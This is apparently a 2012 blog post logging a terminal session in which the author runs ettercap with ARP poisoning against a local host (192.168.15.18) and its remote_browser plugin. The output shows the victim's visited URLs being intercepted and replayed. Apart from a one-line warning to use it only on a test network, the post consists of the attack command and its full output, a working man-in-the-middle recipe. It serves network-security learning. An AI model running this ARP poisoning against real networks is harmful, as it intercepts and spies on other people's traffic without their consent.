Thursday, December 20, 2012

Ettercap using browser plugin. Do not do this outside of test network

>interface=en0
>echo $interface
en0
>ip=192.168.15.18
>echo $ip
192.168.15.18
>sudo ettercap -T -Q -M arp:remote -i $interface /$ip/ // -P remote_browser
Password:

ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA

Listening on en0... (Ethernet)

   en0 -> 7C:D1:C3:E9:51:23     192.168.15.18     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  40 protocol dissectors
  55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:


 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating remote_browser plugin...

suff .htm
REMOTE COMMAND: mozilla -remote openurl(http://interface.eyecon.ro/demos/drag.html)
REMOTE COMMAND: mozilla -remote openurl(http://en.wikipedia.org/)
suff .php

Press q to quit properly!

Closing text interface...

ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.

>